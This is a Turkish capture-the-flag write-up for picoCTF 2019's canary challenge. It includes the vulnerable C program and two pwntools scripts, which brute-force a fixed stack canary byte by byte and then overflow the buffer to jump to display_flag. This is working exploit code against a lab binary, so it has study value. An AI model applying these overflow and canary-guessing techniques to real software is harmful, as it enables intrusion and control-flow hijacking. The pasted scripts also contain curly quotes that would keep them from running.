Kaynak bir C programında arabellek taşması (buffer overflow) ile kodun çalışmasını değiştirme. flag.txt dosyasını okumaya çalışacağız; bunun için sabit bir canary değerini brute force ile bulmaya çalışacağız. Burada canary.txt'den okunan canary değeri sabittir. Amaç, arabelleği taşırıp (overflow) doğru canary değerini ekleyerek programın akışını display_flag fonksiyonuna yönlendirmektir.

payload = 'F'*32 + canary + 'A'*0x10 + p32(0x566547ed)

Kaynak: picoctf 2019

Kaynak C dosyası (vuln.c) kodları:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <wchar.h>
#include <locale.h>

#define BUF_SIZE 32
#define FLAG_LEN 64
#define KEY_LEN 4

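/*
 * Print the first line of ./flag.txt to stdout.
 *
 * Never called from main(); it is only reachable by redirecting control flow,
 * which is what the write-up's overflow does.
 *
 * Fixes relative to the pasted source: the quote characters were mangled
 * (curly quotes do not compile), the FILE handle was never closed, and the
 * fgets() result was not checked, so an empty file would puts() an
 * uninitialised buffer.
 */
void display_flag(void) {
    char buf[FLAG_LEN];
    FILE *f = fopen("flag.txt", "r");
    if (f == NULL) {
        printf("‘flag.txt’ missing in the current directory!\n");
        exit(0);
    }
    /* fgets() reads at most FLAG_LEN-1 bytes and NUL-terminates, so puts()
     * is bounded; skip the print if nothing could be read. */
    if (fgets(buf, FLAG_LEN, f) != NULL) {
        puts(buf);
    }
    fclose(f);
    fflush(stdout);
}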

/* Canary bytes loaded from canary.txt by read_canary(); vuln() copies them
 * onto its stack and later memcmp()s against this global. Because the value
 * comes from a file rather than a per-process random source, it is the same
 * for every run — which is what makes the byte-by-byte guessing in the
 * write-up possible. */
char key[KEY_LEN];
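/*
 * Load KEY_LEN canary bytes from the challenge's canary.txt into the global
 * `key`. Exits if the file cannot be opened or is shorter than KEY_LEN.
 *
 * Fixes relative to the pasted source: mangled quote characters, and an
 * unchecked fread() that silently left `key` partially filled on a short
 * file. The exit status on failure is kept as the original's exit(0).
 */
void read_canary(void) {
    FILE *f = fopen("/problems/canary_6_c4c3b4565f3c8c0c855907b211b63efe/canary.txt", "r");
    if (f == NULL) {
        printf("[ERROR]: Trying to Read Canary\n");
        exit(0);
    }
    if (fread(key, sizeof(char), KEY_LEN, f) != KEY_LEN) {
        /* A short read would leave some of `key` unset; treat it as fatal. */
        printf("[ERROR]: Canary file shorter than KEY_LEN bytes\n");
        fclose(f);
        exit(0);
    }
    fclose(f);
}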

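/*
 * Read a length from stdin, then read that many bytes into a 32-byte buffer
 * and verify a stack-local copy of the canary.
 *
 * This is the challenge's vulnerable function and its behaviour is kept:
 * `count` is attacker-controlled and never compared with BUF_SIZE, so
 * read(0, buf, count) writes past `buf`, over `canary`, and on to the
 * return address. Mitigation (not applied, because this file is the
 * challenge target the write-up exploits):
 *     if (count < 0 || count > BUF_SIZE) count = BUF_SIZE;
 * The memcmp() check also only detects a *changed* canary; since `key` is a
 * fixed file value, a correct guess passes it.
 *
 * Fixes relative to the pasted source: mangled quote characters, and `count`
 * now starts at 0 so a failed sscanf() no longer reads an uninitialised int.
 */
void vuln(void) {
    char canary[KEY_LEN];
    char buf[BUF_SIZE];
    char user_len[BUF_SIZE];

    int count = 0;
    int x = 0;
    memcpy(canary, key, KEY_LEN);
    printf("Please enter the length of the entry:\n> ");

    /* Read up to BUF_SIZE bytes one at a time until a newline. NOTE(review):
     * if 32 bytes arrive without a newline, user_len is not NUL-terminated and
     * sscanf() below may read past it. */
    while (x < BUF_SIZE) {
        read(0, user_len + x, 1);
        if (user_len[x] == '\n') break;
        x++;
    }
    sscanf(user_len, "%d", &count);

    printf("Input> ");
    /* Unbounded: see the mitigation in the header comment. */
    read(0, buf, count);

    if (memcmp(canary, key, KEY_LEN)) {
        printf("*** Stack Smashing Detected *** : Canary Value Corrupt!\n");
        exit(-1);
    }
    printf("Ok… Now Where’s the Flag?\n");
    fflush(stdout);
}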

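/*
 * Entry point: unbuffer stdout, set the process' real/saved gid to its
 * effective gid, load the canary, then run the vulnerable routine.
 *
 * Fixes relative to the pasted source: the unused `int i` is gone, and the
 * setresgid() result is checked — silently continuing after a failed
 * gid change is a classic privilege-handling bug (CWE-273 style). argc/argv
 * are kept in the signature but unused.
 */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    setvbuf(stdout, NULL, _IONBF, 0);

    gid_t gid = getegid();
    if (setresgid(gid, gid, gid) != 0) {
        perror("setresgid");
        exit(1);
    }

    read_canary();
    vuln();

    return 0;
}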

overflow (taşma) ile canary bulma için brute force scripti deneme.py:

from pwn import *
def find_canary():
    """Recover the 4-byte canary one byte at a time from repeated runs of ./vuln.

    For each position n in 0..3, every candidate byte i is sent after a
    32-byte filler and the bytes already recovered; the candidate whose run
    prints "Ok…" (the memcmp in vuln() passed) is kept. This works only
    because the canary comes from a file and is identical in every process;
    a per-process random canary (the compiler's stack protector) gives no
    such per-byte oracle.

    NOTE(review): Python 2 code — `chr(i)` yields a one-byte str and
    `.encode('hex')` does not exist on Python 3 str.
    """
    canary = “”

    for n in range(0, 4):
        for i in range(0, 256):
            p = process(‘./vuln’)
            # 32 filler bytes cover buf[BUF_SIZE]; the following bytes land on
            # vuln()'s local `canary` copy.
            check = ‘F’*32 + canary + chr(i)
            p.readuntil(‘> ‘)
            # length 33 + n: the already-confirmed bytes plus one new guess.
            p.sendline(str(33 + n))
            p.readuntil(‘Input> ‘)
            p.sendline(check)
            out = p.recvall()
            print(check)
            print(out)
            if “Ok…” in out:
                canary += chr(i)
                print(canary)
                break

    print(“Canary Found: ” + canary.encode(‘hex’))
    return canary
# Runs the brute force immediately when the script is executed; the
# returned canary is discarded here (only printed inside find_canary()).
find_canary()

overflow (taşma) ile canary bulma ve payload oluşturma scripti script.py:

Önce display_flag fonksiyonunun adresini bulalım: objdump -D -Mintel vuln | grep display_flag

#! /usr/bin/env python2

from pwn import *

def find_canary():
    """Recover the 4-byte canary byte by byte from repeated runs of the binary.

    Same oracle as the deneme.py version: for each position n the candidate
    byte i is appended after a 32-byte filler and the bytes already found, and
    a run that prints "Ok…" confirms the guess. It depends on the canary being
    file-backed and therefore identical across processes; a per-process
    random canary would defeat it.

    Reads the module-level `e` (the ELF opened at the bottom of the script)
    for the binary path. Python 2 only: `.encode('hex')` on str.
    """
    canary = “”
    for n in range(0, 4):
        for i in range(0, 256):
            p = process(e.path)
            check = ‘A’*32 + canary + chr(i)
            p.readuntil(‘> ‘)
            # 33 + n bytes: confirmed canary bytes plus one new guess.
            p.sendline(str(33 + n))
            p.readuntil(‘Input> ‘)
            p.sendline(check)
            out = p.recvall()

            if “Ok…” in out:
                canary += chr(i)
                break

    print(“Canary Found: ” + canary.encode(‘hex’)+canary)
    return canary

def solve(canary):
    """Send the overflow payload and print the line that follows "Ok…".

    The target address 0x566547ed is hard-coded (the write-up obtains it with
    the objdump command quoted above), so the author's loop restarts the
    process until, per their comment, the PIE base lines up; it stops once a
    received line contains "pico".

    NOTE(review): `p.recvuntil("Ok… …")` sits outside the try and will raise
    if the process exits before printing that line (vuln() exit(-1)s on a
    canary mismatch). On the success path `p` is never closed.
    """
    flag_text = “”

    #loop until the PIE address lines up enough to print the flag
    while (“pico” not in flag_text):
        payload = ‘F’*32 + canary + ‘A’*0x10 + p32(0x566547ed)
        p = process(e.path)

        p.readuntil(‘> ‘)
        # The length sent is the exact payload size, so read() copies all of it.
        p.sendline(str(len(payload)))
        p.readuntil(‘Input> ‘)
        p.send(payload)
        p.recvuntil(“Ok… Now Where’s the Flag?\n”)
        try:
            flag_text=p.recvuntil(“\n”)
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt; narrow
            # it to EOFError (presumably the process died on a wrong address).
            p.close()

    print(“Flag: ” + flag_text)

# Presumably silences pwntools' per-process log lines. `logging` is not
# imported explicitly here, so this relies on `from pwn import *` exporting it
# — verify on the pwntools version in use.
context.log_level = logging.ERROR
# Module-level ELF handle; find_canary() and solve() read it as the global `e`.
e = ELF(“./vuln”)

canary = find_canary()
solve(canary)